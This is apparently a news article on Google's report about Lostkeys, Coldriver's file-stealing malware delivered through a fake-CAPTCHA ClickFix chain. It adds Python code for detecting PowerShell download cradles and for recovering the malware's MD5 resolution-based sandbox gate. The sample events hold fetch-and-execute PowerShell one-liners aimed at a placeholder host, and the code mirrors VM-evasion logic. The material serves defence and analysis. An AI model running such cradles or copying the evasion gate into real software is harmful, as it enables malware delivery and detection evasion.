Google Identifies Lostkeys, a Russian Malware That Can Steal Specific Files and Directories

By Jane Austen, May 13, 2025


Google Threat Intelligence Group (GTIG) last week published a report on a new piece of malware. Dubbed Lostkeys, it is described as data-theft malware and is attributed to the Russian threat group Coldriver. Lostkeys is considered dangerous because it is delivered at the end of a multi-step chain that begins with a lure website. The malware steals files matching a hard-coded list of extensions and directories, and it also sends system information and the list of running processes to the attacker.

New Malware Linked to Russian Threat Group Coldriver Identified

In a blog post, the Mountain View-based company said the malware was first observed in January 2025, with further sightings in March and April. It appears to be a new tool in the arsenal of Coldriver (also tracked as UNC4057, Star Blizzard, and Callisto).

Google notes that Coldriver is known for credential phishing against high-profile targets, including NATO governments, non-governmental organisations (NGOs), militaries, journalists, and diplomatic officials. The group was linked to the Spica malware in 2024.

The group's modus operandi is more involved than a typical phishing attack. First, emails impersonating legitimate institutions are sent to victims. These emails contain links to lure websites, which present a fake CAPTCHA to make the page look legitimate. When the user "completes" the CAPTCHA, the page silently copies a PowerShell command to the user's clipboard (a social-engineering technique commonly referred to as ClickFix).

PowerShell is a command-line shell and scripting language built into Windows and used primarily for system administration, automation, and configuration management. Because it ships with the operating system, has deep access to the system, and can fetch and run code without ever writing it to disk, attackers frequently abuse it to download and execute malware in memory.
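The in-memory download-and-execute pattern described above leaves a recognisable trace in process-creation telemetry: a PowerShell process whose parent is the user's shell and whose command line carries a web-download primitive, a hidden window, or a base64-encoded command. The detector below is an added example (not GTIG's code, and not a published rule for this campaign). The Sysmon-style events, process IDs and `lure.example.invalid` URL are constructed for the demonstration, and the indicator list and the threshold of three indicators are the author's assumptions, not something the report specifies.

```python
import base64
import re

# Constructed Sysmon-style process-creation events (Event ID 1 fields), not real telemetry.
# Event 4101 carries an -EncodedCommand built here so the sample stays self-contained.
ENCODED_CRADLE = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://lure.example.invalid/stage2')"
    .encode("utf-16-le")
).decode("ascii")

SAMPLE_EVENTS = [
    {   # ClickFix: clipboard contents pasted into the Run dialog, so explorer.exe is the parent
        "ProcessId": 4100, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": 'powershell -w hidden -c "iwr http://lure.example.invalid/stage2 | iex"',
    },
    {   # Same chain, cradle hidden behind -enc (base64 of UTF-16LE)
        "ProcessId": 4101, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell -nop -enc " + ENCODED_CRADLE,
    },
    {   # Benign: maintenance script launched from cmd.exe
        "ProcessId": 4102, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell -File C:\scripts\backup.ps1",
    },
    {   # Benign: user opened an interactive shell from the Start menu
        "ProcessId": 4103, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": "powershell",
    },
]

# Download-and-execute primitives that appear in one-line cradles (assumed indicator list).
CRADLE_PATTERNS = [
    r"\biwr\b", r"invoke-webrequest", r"\biex\b", r"invoke-expression",
    r"downloadstring", r"downloadfile", r"net\.webclient", r"start-bitstransfer",
    r"frombase64string", r"\bmshta\b", r"\bcurl\b",
]
# PowerShell accepts any unambiguous prefix of -EncodedCommand: -e, -ec, -enc, ...
ENCODED_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
# -w hidden / -WindowStyle Hidden
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext of an -EncodedCommand argument, or None if absent or invalid."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_event(ev):
    """List the reasons a process-creation event looks like a ClickFix PowerShell cradle."""
    reasons = []
    if not ev.get("Image", "").lower().endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    if ev.get("ParentImage", "").lower().endswith("explorer.exe"):
        reasons.append("powershell spawned by explorer.exe (Run dialog or shell)")
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command present")
    # Match indicators against the decoded payload as well, so -enc does not hide them.
    effective = cmd if decoded is None else cmd + " " + decoded
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window requested")
    if re.search(r"https?://", effective, re.I):
        reasons.append("remote URL in command line")
    for pat in CRADLE_PATTERNS:
        if re.search(pat, effective, re.I):
            reasons.append("download/execute primitive: " + pat)
    return reasons


def detect_clickfix(events, min_reasons=3):
    """Return (ProcessId, reasons) for events that accumulate at least min_reasons indicators."""
    hits = []
    for ev in events:
        reasons = score_event(ev)
        if len(reasons) >= min_reasons:
            hits.append((ev["ProcessId"], reasons))
    return hits


if __name__ == "__main__":
    for pid, reasons in detect_clickfix(SAMPLE_EVENTS):
        print(pid, "->", "; ".join(reasons))
```

Scoring on several independent indicators rather than a single string match keeps a plain `explorer.exe -> powershell.exe` launch (a user opening a shell) below the threshold while still catching the encoded variant, because the decoded payload is scanned alongside the raw command line.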

Once the command is on the clipboard, the page instructs the user to open the Windows Run prompt (Win+R), paste it, and execute it. Doing so triggers the second stage, which computes the MD5 hash of the device's display resolution and compares it against hard-coded values; if the hash matches, execution stops. GTIG assesses this is most likely a check to avoid running inside virtual machines and analysis sandboxes. If the check passes, a third stage is retrieved.
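The resolution check above is a weak but effective sandbox gate: the script never stores the resolutions it refuses to run on, only their MD5 digests. The input space is tiny, however, so an analyst can recover them by hashing candidate resolutions. The code below is an added example (not the stage-2 script and not GTIG's tooling) that mirrors the gate and then recovers the blocked values. The blocklist is constructed here from typical VM console resolutions rather than taken from the report, the exact string format the real script hashes is not stated in the report and is therefore tried in several forms, and the candidate list is the author's assumption.

```python
import hashlib


def resolution_md5(width, height, fmt="{w}x{h}"):
    """MD5 hex digest of the display resolution rendered as a string, e.g. '1920x1080'.
    The exact string format the real stage-2 script hashes is not given in the report,
    so the format is a parameter."""
    return hashlib.md5(fmt.format(w=width, h=height).encode("ascii")).hexdigest()


# Constructed stand-in for the digests embedded in the stage-2 script. In a real analysis
# these hex strings are copied out of the deobfuscated script; here they are generated from
# resolutions typical of bare-bones VM consoles, plus one digest no candidate will match,
# to show what an unresolved entry looks like.
VM_RESOLUTIONS = [(800, 600), (1024, 768), (1280, 800)]
BLOCKLIST = {resolution_md5(w, h) for w, h in VM_RESOLUTIONS}
BLOCKLIST.add(hashlib.md5(b"constructed-unknown-entry").hexdigest())


def stage2_would_continue(width, height, blocklist=BLOCKLIST):
    """Mirror the gate described in the report: stop if the resolution hash is blocklisted."""
    return resolution_md5(width, height) not in blocklist


# Analyst side: MD5 is one-way, but the input space is tiny, so hash every plausible
# resolution in a few plausible string formats and look for collisions with the blocklist.
CANDIDATE_RESOLUTIONS = [
    (640, 480), (800, 600), (1024, 768), (1152, 864), (1280, 720), (1280, 800),
    (1280, 1024), (1366, 768), (1440, 900), (1600, 900), (1680, 1050), (1920, 1080),
    (1920, 1200), (2560, 1440), (3840, 2160),
]
CANDIDATE_FORMATS = ("{w}x{h}", "{w} x {h}", "{w},{h}", "{w}{h}")


def recover_blocked_resolutions(blocklist, candidates=CANDIDATE_RESOLUTIONS,
                                formats=CANDIDATE_FORMATS):
    """Map each blocklisted digest to the (width, height, format) that produces it.
    Returns (resolved, unresolved_digests); unresolved entries need a wider dictionary."""
    resolved = {}
    for w, h in candidates:
        for fmt in formats:
            digest = resolution_md5(w, h, fmt)
            if digest in blocklist and digest not in resolved:
                resolved[digest] = (w, h, fmt)
    unresolved = sorted(blocklist - set(resolved))
    return resolved, unresolved


if __name__ == "__main__":
    print("1920x1080 continues:", stage2_would_continue(1920, 1080))
    print("1024x768 continues:", stage2_would_continue(1024, 768))
    resolved, unresolved = recover_blocked_resolutions(BLOCKLIST)
    for digest, (w, h, fmt) in resolved.items():
        print(digest, "<-", fmt.format(w=w, h=h))
    print("unresolved:", unresolved)
```

For a sandbox operator the practical lesson is the converse: once the blocked resolutions are known, configure analysis VMs with a resolution the gate lets through, or patch the comparison out before execution, so the third stage can be collected.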

The third stage then retrieves and decodes the final payload, a Visual Basic Script (VBS) file, which is Lostkeys itself. GTIG notes that it is capable of "stealing files from a hard-coded list of extensions and directories, along with sending system information and running processes to the attacker."

Google states that Coldriver's operations typically aim to steal emails and contacts from targets; on occasion, however, the group also deploys malware such as Spica to access documents on the victim's system. Lostkeys serves a similar goal.

Google has added all the identified malicious websites, domains, and files to Safe Browsing in Google Chrome to protect users. It is also sending government-backed attacker alerts to targeted Gmail and Workspace users; these alerts notify users of the threat and encourage them to enable Enhanced Safe Browsing.
